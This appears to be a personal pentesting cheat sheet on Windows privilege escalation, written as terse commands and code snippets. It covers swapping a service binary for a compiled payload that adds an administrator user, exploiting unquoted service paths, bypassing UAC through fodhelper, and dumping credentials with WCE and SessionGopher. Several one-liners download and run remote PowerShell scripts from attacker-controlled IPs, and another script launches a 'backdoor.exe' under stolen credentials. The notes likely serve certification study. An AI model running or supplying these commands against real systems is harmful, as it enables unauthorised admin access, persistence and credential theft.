Windows Escalation
Last updated
Was this helpful?
Last updated
Was this helpful?
Imagine we have a program that uses a file with system privs. And the program lets us r/w to the file. We can replace the file and then relaunch the program and get our new file to execute:
>icacls ServiioService.exe //see that the file is NTAuth
make a c file called useradd.c
then convert to exe
> i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
> move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
> net stop Serviio
>wmic service where caption="Serviio" get name, caption, state, startmode
>shutdown /r /t 0
>net localgroup Administrators //should see our user "evil"
Batch scripts (.bat):
This is a legacy windows scripting language. It has since been overshadowed by VBS and Powershell. However it still works just fine and is easy to use. A sample Batch script to open cmd:
START cmd.exe
Learn more at
Unquoted Paths:
Such as C:\Program Files\My Program\My Service\service.exe. Will attempt to run an executable from the following paths:(anything in green could be created and would work)
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe
USBPcap:
>driverquery /v //shows USBPcap as a driver
# searchsploit USBPcap
C:\Program Files\USBPcap> type USBPcap.inf //ching if version matches searchsploit
//we then compile it for windows and run it
System info:(or sysinfo)
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
List Processes:
tasklist /SVC
Network Info:
ipconfig /all route print netstat -ano
Firewall:
netsh advfirewall show currentprofile netsh advfirewall firewall show rule name=all
Scheduled tasks:
schtasks /query /fo LIST /v
Installed apps and patch levels:
wmic product get name, version, vendor wmic qfe get Caption, Description, HotFixID, InstalledOn
Read/write files:
accesschk.exe -uws "Everyone" "C:\Program Files"
powershell Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Mounted Disks:
mountvol
driver enum:
powershell driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "VMware"}
Fast privesc checks:(looking to see if these are enabled//set to 1)
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
Check enabled services:
net start or wmic services where 'Caption like "Remote%" and started=true' get Caption
reg query HKEY_CURRENT_USER\Software\Administrator\WinSCP
Run file as another user with powershell.
echo $username = '<username>' > runas.ps1
echo $securePassword = ConvertTo-SecureString "<password>" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1
powerUp and msf can do this
If we can write to the service binary directory
#net localgroup "Remote Desktop Users" <username> /add
Adding admin group:
#net localgroup "Administrators" <username> /add
Groups:
TelnetClients
Remote Desktop Users
Administrators
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
# Compile
gcc suid.c -o suid
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main () { int i; i=system ("net user /add && net localgroup administrators /add"); return 0; }
#Compile
i686-w64-mingw32-gcc -o useradd.exe useradd.c
Add a user: net user /add
Add a user to a group: #net localgroup "Remote Desktop Users" /add
Going from Admin user to Hi Integrity Admin(able to do more commands without UAC stopping us):
//check current group
>whoami /groups
//escalate then check again
>powershell.exe Start-Process cmd.exe -Verb runAs
Windows 10 build 1709:
>C:\Windows\System32\fodhelper.exe
>cd C:\Tools\privilege_escalation\SysinternalsSuite
>sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe //check that autoelevate is set to true
//if so then look at pages 546-554
Windows Credentials Editor (WCE)70 is a security tool that allows one to perform several attacks to obtain clear text passwords and hashes from a compromised Windows host. Among other things, WCE can steal NTLM credentials from memory and dump cleartext passwords stored by Windows authentication packages installed on the target system such as msv1_0.dll, kerberos.dll, and digest.dll.
C:>wce -w
A Fireeye ps1 tool to search a system for passwords like telnet, winscp, rdp, etc
//download tool to kali
#wget htps://raw.githubusercontent.com/fireeye/SessionGopher/master/SessionGopher.ps1
//Set up http server to transfer file and run it on remote target
#python -m SimpleHTTPServer 80
powershell.exe -nop -ep bypass -C iex (New-Object Net.Webclient).DownloadString('http://192.168.13.71/SessionGopher.ps1'); Invoke-SessionGopher -Thorough
Powershell grab and run a ps1 file:
PS>IEX (New-Object Net.WebClient).downloadString('http://10.10.14.20:8888/Sherlock.ps1')
or remote(might have to url encode if you do it from the browser):
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString(‘http://IP:80/ms16032.ps1')"
//great priv esc sheet
Unquoted service path:
If we see a job or command being used that is unquoted and has spaces then we can place a file there that get gabbed first.
ex:
c:\Program Files (x86)\Canon\IJ Scan Utility\SETEVENT.exe
We can then either do an exploit at Program.exe or IJ.exe
Search for unquoted service paths:
>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
//manual check for an unquoted service path by checking the service itself
>sc qc <service name>